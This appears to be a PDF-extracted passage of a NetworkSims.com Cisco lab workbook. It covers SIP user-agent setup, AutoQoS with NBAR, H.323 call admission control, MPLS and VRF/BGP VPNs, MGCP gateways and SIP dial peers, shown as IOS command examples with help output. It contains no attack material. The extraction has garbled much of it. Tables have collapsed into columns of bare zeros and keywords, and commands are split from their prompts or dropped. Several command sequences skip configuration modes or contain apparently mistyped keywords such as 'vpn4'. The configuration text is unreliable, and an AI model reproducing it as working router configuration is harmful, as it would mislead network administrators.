32K bytes of NVRAM.
# config t
(config)# sip-au
(config-sip-ua)# ?
aaa
authentication
calling-info
default
exit
max-forwards
mwi-server
nat
SIP User Agent
no
notify
offer
reason-header
redirection
registrar
remote-party-id
retry
set
sip-server
srv
DNS SRV Query Type
suspend-resume
timers
transport
battery-reversal
bearer-cap
busyout
caller-id
comfort-noise
connection
cptone
default
description
disc_pi_off
disconnect-ack
echo-cancel
exit
impedance
input
music-threshold
mwi
no
non-linear
output
playout-delay
NetworkSims.com
1095
ren
ring
shutdown
signal
snmp
station-id
supervisory
threshold
timeouts
timing
translate
Translation rule
trunk-group
voice-class
LINE A string (up to 64 characters) describing the port connection (e.g.
pbx1)
alerting
Define caller id alerting method
attenuation Configure caller id tx attenuation
block
Block the caller id of the calls made from this port
enable
Enable caller id on this port
format
Change caller id format
cor
hunt
outbound
voice
Voice type
pots
Telephony
vofr
voip
Voice over IP
acc-qos
answer-address
application
call
call-block
carrier-id
clid
Caller ID option
NetworkSims.com
1096
codec
corlist
default
description
destination-pattern
dnis-map
dtmf-relay
exit
expect-factor
fax
fax-relay
huntstop
icpif
incoming
ip
max-conn
max-redirects
modem
no
numbering-type
permission
playout-delay
preference
req-qos
roaming
rtp
session
settle-call
shutdown
signal-type
signaling
snmp
supplementary-service
tech-prefix
tone
translate-outgoing
translation-profile
trunk-group-label
trunkgroup
vad
voice
voice-class
(config)# gateway

Configure fax
fax-relay options
to unlimited
dialpeer
Use roaming server
RTP config
peer
peer
Config supplementary service features
Generate tones
Translation rule
Translation profile
(config-gateway)# ?
GATEWAY configuration commands:
default
emulate
Gateway emulation configuration
exit
Exit from gateway configuration mode
no
security Gateway security configuration
timer
Gateway-wide timers
Cisco CCVP Test 6

NetworkSims.com
1097
VoIP Signalling and Call Control


Outline
This challenge involves the configuration of auto QoS on an interface.
Objectives
Define CEF (Cisco Express Forwarding), as this is required for Auto QoS.
Enable NBAR (Network Based Application Recognition), as this is required for Auto
QoS.
Define the bandwidth on an interface.
Enable Auto QoS.
Example
> en
# config t
(config)# ip cef
(config)# int s0
(config-if)# bandwidth ?
<1-10000000> Bandwidth in kilobits
inherit
Specify how bandwidth is inherited
(config-if)# ip nbar ?
protocol-discovery Enable NBAR protocol discovery
(config-if)# ip nbar protocol ?
<cr>
(config-if)# ip nbar protocol
(config-if)# auto ?
trust Trust the DSCP marking
<cr>
NetworkSims.com
1098
(config-if)# auto qos voip

(config-if)# exit
(config)# exit
# sh ip nbar pr
Serial0/0
Protocol
Input
Output
Packet Count
Packet Count
Byte Count
Byte Count
5 minute bit rate (bps)
5 minute bit rate
(bps)
------------------------ ------------------------ ----------------------bgp
0
0
0
0
0
0
citrix
0
0
0
0
0
0
cuseeme
0
0
0
0
0
0
custom-01
0
0
0
0
0
0
custom-02
0
0
0
0
0
0
custom-03
0
0
custom-04
custom-05
custom-06
custom-07
custom-08
custom-09
custom-10
dhcp
dns
egp
NetworkSims.com
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1099
eigrp
exchange
fasttrack
finger
ftp
gnutella
gopher
gre
http
icmp
imap
ipinip
ipsec
irc
kazaa2
kerberos
l2tp
ldap
napster
NetworkSims.com
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1100
netbios
netshow
nfs
nntp
notes
novadigm
ntp
pcanywhere
pop3
pptp
printer
rcmd
rip
rsvp
rtp
rtspplayer
secure-ftp
secure-http
secure-imap
NetworkSims.com
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1101
secure-irc
secure-ldap
secure-nntp
secure-pop3
secure-telnet
smtp
snmp
socks
sqlnet
sqlserver
ssh
streamwork
sunrpc
syslog
telnet
tftp
vdolive
xwindows
unknown
NetworkSims.com
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1102
Total
0
0
0
0
0
0
0
0
0
0
Explanation
Key facts:
CCNP Objective: QoS Implementation Methods.
AutoQoS for the Enterprise is the next generation of QoS generation, and uses NBAR
for traffic discovery and classification. The basic Auto QoS is Auto QoS VoIP.
For Auto QoS to work, CEF and NBAR must be enabled. Also the bandwidth must be
correctly defined on the interface.
AutoQoS automatically generate QoS commands.
AutoQoS analyzes network traffic and tries to optimize the QoS through traffic classes
that the AutoQoS Discovery method to create policies, which are applied to the
interface(s).
AutoQoS simplifies the configuration.
AutoQoS uses Classification (This uses AutoQoS Discovery with NBAR to discover the
requirements); Policy generation (This uses access-lists, class-maps and policy maps to
optimize the setup); Configuration (This configures the required interfaces);
Monitoring and reporting (This continually updates and reports on the operation); and
Consistancy (This allows for consistancy across a range of devices).

Outline
Objectives
Define Auto QoS
Example
> en
# config t
(config)# cdp run
NetworkSims.com
1103

(config-vlan)# exit
(config-vlan)# exit
(config)# int fa0/1
access
block
broadcast
host
Set port host
mode
multicast
native
trunking mode
nonegotiate
interface
priority
protected
pruning
mode
trunk
unicast
voice
<cr>
dot1p
none
(config-if)# au ?
trust
(config-if)# exit
Note:
NetworkSims.com
1104

Outline
This challenge involves configuring H.323 CAC (Call Admission Control).
Objectives
Define H.323 CAC.
Outline
> en
# config t
(config)# call
(config)# call
(config)# call
(config)# call
(config)# call
(config)# call
(config)# call
(config)# call
threshold interface e0
threshold global cpu-avg low 10 high 50 busyout
threshold global total-calls low 15 high 5000 busyout
threshold global total-mem low 15 high 5000 busyout
threshold global io-mem low 15 high 5000 busyout
spike 20 steps 10 size 1000
treatment on
treatment action hairpin
Example
> en
# config t
(config)# call thres ?
global
the global resources of this gateway
interface
interface triggers for this gateway
poll-interval the poll interval for some resources
(config)# call threshold interface e0
(config)# call thres ?
global
the global resources of this gateway
interface
interface triggers for this gateway
poll-interval the poll interval for some resources
(config)# call
cpu-5sec
cpu-avg
io-mem
proc-mem
total-calls
total-mem
th g ?
the CPU utilization in the last 5 seconds
the average CPU utilization
the IO memory utilization
the Processor memory utilization
the total number of calls
the total memory utilization
(config)# call th g cpu-avg ?

low the low threshold
NetworkSims.com
1105
(config)# call th g cpu-avg l5 ?

<1-100> low threshold in %
(config)# call th g cpu-avg l 15 ?
high the high threshold
(config)# call th g cpu-avg l 15 h ?
<1-100> high threshold in %
(config)# call th g cpu-avg l 15 h 50 ?
busyout
busyout the voice interfaces if out-of-resource
treatment apply out-of-resource to call treatment
<cr>
(config)# call threshold global cpu-avg low 15 high 50 busyout
(config)# call threshold global total-calls low 15 high 5000 busyout
(config)# call threshold global total-mem low 15 high 5000 busyout
(config)# call threshold global io-mem low 15 high 5000 busyout
(config)# call spike ?
<1-2147483647> Incoming call numbers for spiking threshold
(config)# call spike 1 ?
steps number of steps for spiking sliding window
<cr>
(config)# call spike 1 s ?
<3-10> number of steps
(config)# call spike 1 s 3 ?
size step size in millisecond
(config)# call spike 1 s 3 s ?
<100-250> millisecond
(config)# call spike 1 s 3 s 1000 ?
<cr>
(config)# call spike 20 steps 10 size 1000
(config)# call treat ?
action
Action to take when call treatment is triggered
cause-code
Select the cause code for disconnection
isdn-reject Select the ISDN reject cause-code
on
toggle deny on/off
(config)# call treatment on
(config)# call treat a ?
hairpin Hairpin
playmsg play the selected message
reject
Disconnect the call and pass down cause code
(config)# call treatment action hairpin
Cisco CCVP Test 7

Improving and Maintaining Voice Quality
NetworkSims.com
1106
24 MPLS
Cisco MPLS
MPLS Introduction
http://networksims.com/i01.html

Outline
This challenge involves basic frame-mode MPLS configuration.
Objectives
Enable CEF globally.

Enable CEF on S0.
Define IGP routing protocol.
Assign LDP router ID.
Enable IPv4 MPLS on an interface (mpls ip).
Commands
> enable
# config t
(config)# ip cef
(config)# int s0
(config-if)# ip route-cache cef
(config-if)# mpls ip
(config-if)# exit
(config)# mpls ldp router-id loopback5
NetworkSims.com
1107
Example
> enable
# config t
(config)# ip cef
(config)# int s0
(config-if)# ip route- ?
cef
flow
policy
<cr>
(config-if)# ip route-cache cef
(config-if)# mpls ?
accounting
Enable MPLS accounting on this interface
ip
Configure dynamic MPLS forwarding for IP
label
Label properties
ldp
Configure Label Distribution Protocol (LDP) parameters
mtu
Set tag switching Maximum Transmission Unit
netflow
Configure Egress Netflow Accounting
traffic-eng Configure Traffic Engineering parameters
(config-if)# mpls ip
(config-if)# exit
(config)# mpls ?
atm
Configure ATM options
ip
Dynamic MPLS forwarding for IP
ipv6
Dynamic MPLS forwarding for IPv6
label
Label properties
ldp
Label Distribution Protocol
static
Configure static label bindings
(config)# mpls ldp ?
advertise-labels Label advertisements
atm
Configure ATM MPLS options
backoff
Set LDP session backoff parameters
discovery
LDP discovery
explicit-null
Advertise Explicit Null label in place of Implicit Null
graceful-restart Configure LDP Graceful Restart
holdtime
LDP session holdtime
igp
Configure IGP-related LDP parameters
logging
Enable LDP logging
loop-detection
Enable LDP Loop Detection
maxhops
Limit hop count for LDP LSP setup
neighbor
Configure neighbor parameters
path-vector
Path Vector for LDP LSP setup
request-labels
Access list to specify valid downstream on demand
destinations.
router-id
Select interface to prefer for LDP identifier address
session
Configure session parameters
tcp
Set TCP parameters for LDP
(config)# mpls ldp router-id ?
Async
Async interface
BVI
CDMA-Ix
CDMA Ix interface
NetworkSims.com
1108
CTunnel
CTunnel interface
Dialer
Dialer interface
Ethernet
IEEE 802.3
FastEthernet
Group-Async
Lex
Lex interface
Loopback
Loopback interface
MFR
Multilink
Null
Null interface
Port-channel
Serial
Serial
TokenRing
IEEE 802.5
Tunnel
Tunnel interface
Vif
Virtual-PPP
Virtual-Template
(config)# mpls ldp router-id loopback5

Outline
This challenge involves configuration of MPLS over a routed PVC in ATM.
Objectives
Enable CEF globally.

Enable MPLS on ATM.
Define ATM interface parameters.
Define ATM sub-interface.
Commands
> enable
# config t
(config)# ip cef
(config-if)# exit
(config)# int atm0
(config)# int atm0.1 point-to-point
(config-subif)# mpls ip
(config-if-atm-vc# encapsulation aal5snap
(config-if-atm-vc# exit
NetworkSims.com
1109
(config-if)# exit
Example
> enable
# config t
(config)# ip cef
(config-if)# exit
(config)# int atm0
(config)# int atm0.1 ?
mpls
Treat as an MPLS link
multipoint
tag-switching
Treat as a tag switching link (obsolete, use mpls)
<cr>
(config)# int atm0.1 point-to-point
(config-subif)# mpls ?
atm
Tag controlled ATM parameters
ip
Configure dynamic MPLS forwarding for IP
label
Label properties
ldp
Configure Label Distribution Protocol (LDP) parameters
mtu
Set tag switching Maximum Transmission Unit
netflow
Configure Egress Netflow Accounting
(config-subif)# mpls ip
(config-subif)# pvc ?
<0-7>
WORD
(config-if-atm-vc)# encapsulation ?
aal5mux
aal5nlpid
aal5snap
(config-if-atm-vc# encapsulation aal5snap
(config-if)# exit
Cisco MPLS
MPLS Basics
http://networksims.com/i02.html
NetworkSims.com
1110

Outline
This challenge involves an MPLS VPN configuration, whihc is often seen in ISP
applications, and uses MPLS forwarding and VRF (Virtual Routing and Forwarding). VRF is
used to create multiple instances of a routing table within the same router, at the same time.
Thus the same, or overlapping, IP addresses can be used without a conflict, as all of these
routing instances are independent. VRF uses Forwarding Information Bases (FIBs), which
are distinct routing tables. With an MPLS domain, the Provider Edge (PE) routing switch is
the only device to have knowledge of the multiple different virtual routing engines, and
Customer Edge (CE) devices then participate in their MPLS VPN routing via route
dissemination (RD) to and from the PE, using a routing engine such as eBGP, OSPF or
static routing. All the other Provider (P) switches in backbone do not have any knowledge
of IP routing within this context. The PE traffic travels over the core network using label
switching. This challenge involves the configuration of the VRF on the PE routers, and the
next challenge sets up BGP PE-PE Routing on PE Routers, which is required to transport the
routes over the backbone.
Objectives
Configure VRF.
Configure RD (which is used to make a unique IP address).
Configure import and export policy (RT).
Associate VRF with an interface
Commands
> enable
# config t
(config)# ip cef
(config-if)# ip vrf forwarding Testing
(config-if)# exit
(config)# ip vrf Testing
(config-vrf)# rd 1:100
(config-vrf)# route-target both 1:100
(config)# int s0
(config-if)# exit
Example
NetworkSims.com
1111
> enable
# config t
(config)# ip cef
(config-if)# exit
(config)# ip vrf ?
WORD VPN Routing/Forwarding instance name
(config-vrf)# ?
bgp
Commands pertaining to BGP
context
Associate SNMP context with this vrf
default
description
exit
maximum
Set a limit
mdt
Backbone Multicast Distribution Tree
no
rd
vpn
Configure VPN ID as specified in rfc2685
(config-vrf)# rd ?
(config-vrf)# route-target
both
export
import
?
Target VPN Extended Community
Both import and export Target-VPN community
Export Target-VPN community
Import Target-VPN community
(config-vrf)# route-target both ?

ASN:nn or IP-address:nn Target VPN Extended Community
(config)# int s0
receive
Add Interface Address into VRF Table
sitemap
WORD Table name
(config-if)# exit
The RD value creates routing and forwarding tables. It is added at the beginning of
customer IP addresses, to convert them to unique IP address. It can either be:
16-bit AS number: 32-bit number. For example 1:100, which has an AS of 1, and a 32-bit
number of 100.
32-bit IP number: 16-bit number. For example 192.168.1.1:1, which has a 16-bit value of 1.
The VRF is associated with an interface with:

NetworkSims.com
1112

Outline
The previous challenge involved the configuration of the VRF on the PE routers, and this
next challenge sets up BGP PE-PE Routing on PE Routers, which is required to transport the
routes over the backbone.
Objectives
Configure VRF.
Configure RD (which is used to make a unique IP address).
Configure import and export policy (RT).
Associate VRF with an interface.
Configure BGP PE-PE on a PE device.
Commands
> enable
# config t
(config)# ip cef
(config-if)# exit
(config)# int s0
(config-if)# exit
(config-router)# neighbor 138.199.17.1 update-source loopback5
(config-router)# address-family vpn4
(config-router-af)# neighbor 1.2.3.4 send-community extended
(config-router-af)# neighbor 1.2.3.4 activate
Example
> enable
# config t
(config)# ip cef
(config-if)# exit
NetworkSims.com
1113
(config)# ip vrf ?
WORD VPN Routing/Forwarding instance name
(config-vrf)# ?
bgp
Commands pertaining to BGP
context
Associate SNMP context with this vrf
default
description
exit
maximum
Set a limit
mdt
Backbone Multicast Distribution Tree
no
rd
vpn
Configure VPN ID as specified in rfc2685
(config-vrf)# rd ?
(config-vrf)# route-target
both
export
import
?
Target VPN Extended Community
Both import and export Target-VPN community
Export Target-VPN community
Import Target-VPN community
(config-vrf)# route-target both ?

ASN:nn or IP-address:nn Target VPN Extended Community
(config)# int s0
receive
Add Interface Address into VRF Table
sitemap
WORD Table name
(config-if)# exit
(config-if)# exit
(config-router)# neighbor 138.199.17.1 update-source loopback5
(config-router)# address-family vpn4
(config-router-af)# ?
Router Address Family configuration commands:
auto-summary
autonomous-system
Specify AS number for Address Family
default
default-metric
distance
distribute-list
eigrp
EIGRP specific commands
exit-address-family Exit from Address Family configuration mode
help
maximum-paths
metric
Modify EIGRP routing metrics and parameters
network
no
offset-list
Add or subtract offset from RIP metrics
NetworkSims.com
1114
redistribute
variance
(config-router-af)# neighbor ?
A.B.C.D
Neighbor address
WORD
Neighbor tag
X:X:X:X::X Neighbor IPv6 address
(config-router-af)# neighbor 1.2.3.4 ?
activate
advertise-map
advertisement-interval Minimum interval between sending BGP routing updates
allowas-in
description
distribute-list
dmzlink-bw
Propagate the DMZ link bandwidth
ebgp-multihop
networks
filter-list
local-as
maximum-prefix
next-hop-self
password
Set a password
peer-group
prefix-list
remote-as
remove-private-AS
route-map
route-reflector-client Configure a neighbor as Route Reflector client
send-community
shutdown
timers
unsuppress-map
Route-map to selectively unsuppress suppressed routes
update-source
version
weight
(config-router-af)# neighbor 1.2.3.4 send ?
both
Send Standard and Extended Community attributes
extended Send Extended Community attribute
standard Send Standard Community attribute
<cr>
(config-router-af)# neighbor 1.2.3.4 send-community extended
(config-router-af)# neighbor 1.2.3.4 activate
NetworkSims.com
1115
25 CCNP (Voice Gateway)

Cisco Gateway and Gatekeeper
Gateway and Gatekeeper Introduction
http://networksims.com/ga01.html

Outline
This challenge involves basic MGCP gateway configuration.
Objectives
Define MGCP Gateway configuration
Commands
> enable
# config t
(config)# mgcp
If the MGCP configuration is to be loaded from CallManager, the IP address of the TFTP
server (such as CallManager) must be defined, such as:
(config)# ccm-manager config
(config)# ccm-manager config server 192.168.1.2
And then to bind MGCP to the voice ports:

(config-dial-peer)# application MGCPAPP
NetworkSims.com
1116
And there needs to be at least one dial peer in case CallManager is not available:
(config)# dial-peer
(config-dial-peer)#
(config-dial-peer)#
(config-dial-peer)#
(config-dial-peer)#
voice 200 pots

incoming called-number .
port 1/0/1
exit
Next the IP address that CallManager communicates with is defined:

(config-if)# exit
(config)# mgcp bind control source-interface loopback15
and to enable DTMF-relay:

(config)# mgcp dtmf-relay voip code all mode out-of-band
and to enable the MGCP gateway to use the fallback mode:

(config)# ccm-manager fallback-mgcp
(config)# ccm-manager redundant-host 192.168.1.1
and finally the details can be shown:

(config)# exit
# sh ccm-manager
# sh mgcp
Example
> enable
# config t
> enable
# config t
(config)# mgcp
(config)# ccm-manager config server 192.168.1.2
(config)# ccm-manager control
(config-dial-peer)# incoming called-number .
(config-if)# exit
(config)# mgcp bind ?
control bind only MGCP control packets
media
bind only media packets
NetworkSims.com
1117
(config)# mgcp bind control ?

source-interface Specify interface for source address of MGCP packets
(config)# mgcp bind control source-interface ?
Async
Async interface
BVI
CTunnel
CTunnel interface
Dialer
Dialer interface
FastEthernet
Loopback
Loopback interface
MFR
Multilink
Null
Null interface
Serial
Serial
Tunnel
Tunnel interface
Vif
Virtual-Template
(config)# mgcp bind control source-interface loopback15
(config)# mg dt ?
voaal2 Enable mgcp dtmf-relay for VoAAL2 Calls (using Annex K Type3
packets).
voip
Enable mgcp dtmf-relay for VoIP Calls
(config)# mg dt voi ?
codec Configure mgcp dtmf-relay codec
(config)# mg dt voi c ?
all
Enable mgcp dtmf-relay for all codec
low-bit-rate Enable mgcp dtmf-relay for low-bit-rate codec
(config)# mg dt voi c a ?
mode Set mgcp dtmf-relay mode
(config)# mg dt voi c a m ?
cisco
Set mgcp dtmf-relay mode to be cisco
nse
Set mgcp dtmf-relay mode to be nse
nte-ca
Set mgcp dtmf-relay mode to be nte-ca
nte-gw
Set mgcp dtmf-relay mode to be nte-gw
out-of-band Set mgcp dtmf-relay mode to be out-of-band
(config)# mgcp dtmf-relay voip code all mode out-of-band
(config)# ccm ?
application
application specific
config
MGCP download configuration
download-tones
Enable Tone Download from TFTP server
fallback-mgcp
Enable Fallback from MGCP to H.323 mode if no Call
fax
Enable fax protocol for MGCP
mgcp
Enable Call Manager Application MGCP mode
music-on-hold
Enable multicast Music-on-hold
redundant-host
Redundant host list
sccp
Enable Call Manager Application SCCP mode
shut-backhaul-interfaces Shutdown the backhauled interfaces if no Call
switchback
Configure switchback options for rehoming to
(config)# ccm-manager fallback-mgcp
(config)# ccm-manager redundant-host ?
WORD IP address or Domain name of backup host number 1
(config)# ccm-manager redundant-host 1.2.3.4 ?
WORD IP address or Domain name of backup host number 2
<cr>
NetworkSims.com
1118
(config)# ccm-manager redundant-host 192.168.1.1

(config)# exit
# sh ccm-manager
MGCP Domain Name: Router
Priority
Status
Host
============================================================
Primary
Down
1.2.3.4
First Backup
None
Second Backup
None
Current active Call Manager:
Backhaul/Redundant link port:
Failover Interval:
Keepalive Interval:
Last keepalive sent:
)
Last MGCP traffic time:
Last failover time:
Last switchback time:
Switchback mode:
MGCP Fallback mode:
Last MGCP Fallback start time:
Last MGCP Fallback end time:
None
2428
30 seconds
15 seconds
23:59:59 UTC Feb 28 1993 (elapsed time: 00:05:3
00:02:21 UTC Mar 1 1993 (elapsed time: 00:03:10
None
None
Graceful
Enabled/OFF
None
None
Backhaul/Redundant link is down

Configuration Auto-Download Information
=======================================
No configurations downloaded
Current state: Waiting for commands
Configuration Download statistics:
Download Attempted
:
Download Successful
:
Download Failed
:
Configuration Attempted
:
Configuration Successful
:
Configuration Failed(Parsing):
Configuration Failed(config) :
Last config download command:
Configuration Error History:
TFTP File download failed
1
0
1
0
0
0
0
FAX mode: cisco

Router# sh mg
MGCP Admin State ACTIVE, Oper State ACTIVE - Cause Code NONE
MGCP call-agent: 1.2.3.4 Initial protocol service is MGCP 0.1
MGCP block-newcalls DISABLED
MGCP validate domain name DISABLED
MGCP send SGCP RSIP: forced/restart/graceful/disconnected DISABLED
MGCP quarantine mode discard/step
MGCP quarantine of persistent events is ENABLED
MGCP dtmf-relay for VoIP disabled for all codec types
MGCP dtmf-relay for VoAAL2 disabled for all codec types
MGCP voip modem passthrough disabled
MGCP voaal2 modem passthrough disabled
MGCP voip modem relay: Disabled.
MGCP TSE payload: 100
MGCP T.38 Named Signalling Event (NSE) response timer: 200
MGCP Network (IP/AAL2) Continuity Test timer: 200
MGCP 'RTP stream loss' timer: 5
MGCP request timeout 500
MGCP maximum exponential request timeout 4000
MGCP gateway port: 2427, MGCP maximum waiting delay 3000
NetworkSims.com
1119
MGCP
MGCP
MGCP
MGCP
MGCP
MGCP
MGCP
MGCP
MGCP
MGCP
MGCP
MGCP
MGCP
MGCP
MGCP
MGCP
MGCP
MGCP
MGCP
SGCP
MGCP
MGCP
MGCP
MGCP
MGCP
MGCP
MGCP
MGCP
MGCP
MGCP
MGCP
MGCP
restart delay 0, MGCP vad DISABLED

rtrcac DISABLED
system resource check DISABLED
xpc-codec: DISABLED, MGCP persistent hookflash: DISABLED
persistent offhook: ENABLED, MGCP persistent onhook: DISABLED
piggyback msg ENABLED, MGCP endpoint offset DISABLED
simple-sdp DISABLED
undotted-notation DISABLED
codec type g711ulaw, MGCP packetization period 20
JB threshold lwm 30, MGCP JB threshold hwm 150
LAT threshold lwm 150, MGCP LAT threshold hwm 300
PL threshold lwm 1000, MGCP PL threshold hwm 10000
CL threshold lwm 1000, MGCP CL threshold hwm 10000
playout mode is adaptive 60, 40, 200 in msec
Fax Playout Buffer is 300 in msec
media (RTP) dscp: ef, MGCP signaling dscp: af31
default package: line-package
supported packages: gm-package dtmf-package trunk-package line-package
hs-package atm-package ms-package dt-package res-package
mt-package fxr-package
Digit Map matching order: shortest match
Digit Map matching order: always left-to-right
VoAAL2 ignore-lco-codec DISABLED
T.38 Fax is ENABLED
T.38 Fax ECM is ENABLED
T.38 Fax NSF Override is DISABLED
T.38 Fax Low Speed Redundancy: 0MGCP T.38 Fax High Speed Redundancy: 0
control bind :DISABLED
media bind :DISABLED
Upspeed payload type for G711ulaw: 0, G711alaw: 8
Dynamic payload type for G.726-16K codec
Dynamic payload type for G.726-24K codec
Dynamic payload type for G.Clear codec
Guaranteed scheduler time is disabled

MGCP Gateway

Outline
This challenge involves H.323 configuration.
Objectives
NetworkSims.com
1120
Define H.323 voice class configuration.
Commands
> enable
# config t
(config)# voice class codec 44
(config-class)# ?
(config-class)# codec preference 1 g728
(config-class)# codec preference 2 g729r8
(config-class)# exit
(config-dial-peer)# voice-class code 44
Example
> enable
# config t
(config)# voice class codec 44
(config-class)# ?
VOICECLASS configuration commands:
codec Set class codec parameters
exit
Exit from voice class configuration mode
help
no
(config-class)# codec ?
preference Set priority order for using this codec
(config-class)# codec preference ?
<1-14> Priority order (1 = Highest)
(config-class)# codec preference 1 ?
clear-channel Clear Channel 64000 bps (No voice capabilities: data transport
only)
g711alaw
G.711 A Law 64000 bps
g711ulaw
G.711 u Law 64000 bps
g723ar53
G.723.1 ANNEX-A 5300 bps (contains built-in vad that cannot be
disabled)
g723ar63
G.723.1 ANNEX-A 6300 bps (contains built-in vad that cannot be
disabled)
g723r53
G.723.1 5300 bps
g723r63
G.723.1 6300 bps
g726r16
G.726 16000 bps
g726r24
G.726 24000 bps
g726r32
G.726 32000 bps
g728
G.728 16000 bps
g729br8
G.729 ANNEX-B 8000 bps (contains built-in vad that cannot be
disabled)
g729r8
G.729 8000 bps
(config-class)# codec preference 1 g728
(config-class)# exit
NetworkSims.com
1121

(config-dial-peer)# voice-class code 44

Outline
This challenge involves Voice Service VoIP Configuration.
Objectives
Define Voice Service.
Commands
> enable
# config t
(config)# voice service voip
(conf-voi-serv)# allow-connections h323 to h323
(conf-voi-serv)# h323
(conf-serv-h323)# no h225 timeout keepalive
(conf-serv-h323)# call service stop
(conf-serv-h323)# call start slow
Example
> enable
# config t
Router(conf-voi-serv)# ?
VOICE SERVICE configuration commands:
allow-conn Define connections
cause-code Sets the internal cause code for SIP and H323
default
exit
Exit from voice service configuration mode
fax
Global fax commands
h323
Global H.323 configuration commands
modem
Global modem commands
no
shutdown
Stop VoIP services gracefully without dropping active calls
signaling
Global setting for signaling payload handling
sip
SIP configuration commands
(conf-voi-serv)# allow-connections h323 to h323
(conf-voi-serv)# h323
(conf-serv-h323)# ?
VOICE SERVICE VOIP H323 configuration commands:
bearercap-ie Specify bearercap_ie coding
call
Global setting for H.323 Calls
default
exit
Exit from voice service voip h323 configuration mode
NetworkSims.com
1122
h225
TCP H225 call signalling channel
h245
H245 Signalling
h450
H450 parameter configuration
no
ras
Gateway RAS configuration
session
H323 Voice Protocol session config
(conf-serv-h323)# no ?
bearercap-ie Specify bearercap_ie coding
call
Global setting for H.323 Calls
h225
TCP H225 call signalling channel
h245
H245 Signalling
h450
H450 parameter configuration
ras
Gateway RAS configuration
session
H323 Voice Protocol session config
(conf-serv-h323)# no h225 ?
signal
Specify signaling options
timeout Specify timeout for maintaining connections
(conf-serv-h323)# no h225 t ?
keepalive KEEPALIVE timeout
setup
SETUP timeout
tcp
H225 CSA connection type
(conf-serv-h323)# no h225 timeout keepalive
(conf-serv-h323)# call ?
service H.323 service configuration
start
Global setting for H.323 Call start procedures: Fast/Slow Start
(Default: Fast Start)
(conf-serv-h323)# call service ?
stop Stop H.323 service
(conf-serv-h323)# call
(conf-serv-h323)# call
fast Use Fast Start
slow Use Slow Start
service stop
start ?
procedures to initiate call
procedures to initiate call
(conf-serv-h323)# call start slow

H.323

Outline
NetworkSims.com
1123
This challenge involves SIP Dial Peer configuration.

Objectives
Define SIP dial peers.
Commands
> enable
# config t
(config)# dial-peer
(config-dial-peer)#
(config-dial-peer)#
(config-dial-peer)#
(config-dial-peer)#
(config)# dial-peer
(config-dial-peer)#
(config-dial-peer)#
(config-dial-peer)#
(config-dial-peer)#
voice 1111 voip

session protocol sipv4
session transport tcp
exit
voice 1112 voip
session protocol sipv4
voice-class sip transport switch udp tcp
Example
> enable
# config t
protocol
target
(config-dial-peer)# sess protocol ?
cisco
Cisco Session Protocol
multicast Multicast Session Protocol(voice conferencing)
sipv2
IETF Session Inititation Protocol
(config-dial-peer)# sess transport ?
system defer to voice service voip session transport
tcp
Transport Layer Protocol - TCP
udp
Transport Layer Protocol - UDP
(config-dial-peer)# session transport tcp
(config-dial-peer)# voice-class sip transport switch udp tcp
By default UDP is used as the transport protocol. In the first dial-peer the command:
(config-dial-peer)# session transport tcp
NetworkSims.com
1124
is used so that SIP switches from UDP to TCP when the voice packets get to within 200
bytes of the MTU (Maximum Transmission Unit), and thus avoid any fragmentation of the
UDP segments.
The command:
(config-dial-peer)# voice-class sip transport switch udp tcp
is used to enable switching between UDP and TCP transport SIP messages in a specific dial
peer.

Outline
This challenge involves SIP UA configuratio for the registration of analog phones with a
redundanct server. In this case the maximum number of hops for SIP is defined.
Objectives
Allow a gateway to register E.164 numbers on non-SIP phones with a registrar. For
this the registrar command is used.
Specify the IP address of the SIP server (using sip-server).
Define maximum SIP hops (using max-forwards). This value can range between 1
and 70 (the default is 70).
Disable the listening for SIP UA for messages on port 5060 for UDP (no transport
udp), and will thus listen for TCP messages.
Show the configured E.164 phone number registration (using show sip-ua register
status).
Verify the SIP UA configuration (using show sip-ua status).
Commands
> enable
# config t
(config)# sip-ua
(config-sip-ua)#
(config-sip-ua)#
(config-sip-ua)#
(config-sip-ua)#
(config-sip-ua)#
(config-sip-ua)#
(config)# exit
registrar ipv4:192.168.1.1 tcp

registrar ipv4:192.168.1.2 tcp secondary
sip-server ipv4:192.168.1.3
no transport udp
max-forwards 15
exit
NetworkSims.com
1125
# sh sip-ua status
# show sip-ua register status
Example
> enable
# config t
(config)# sip-ua
(config-sip-ua)# registrar ?
WORD Registrar Server address
(config-sip-ua)# registrar ipv4:192.168.1.1 tcp
(config-sip-ua)# registrar ipv4:192.168.1.2 tcp secondary
(config-sip-ua)# sip ?
WORD Specify the Server address
(config-sip-ua)# sip-server ipv4:192.168.1.3
(config-sip-ua)# no ?
aaa
authentication
calling-info
max-forwards
mwi-server
nat
SIP User Agent
notify
offer
reason-header
redirection
registrar
remote-party-id
retry
set
sip-server
srv
DNS SRV Query Type
suspend-resume
timers
transport
(config-sip-ua)# no tr ?
tcp Disable SIP User Agent in TCP Mode
udp Disable SIP User Agent in UDP Mode
(config-sip-ua)# no transport udp
(config-sip-ua)# max-forwards ?
<1-70> Number of max-forwards
(config-sip-ua)# max-forwards 15
(config)# exit
# sh sip-ua status
SIP User Agent Status
SIP User Agent for UDP : DISABLED
SIP User Agent for TCP : ENABLED
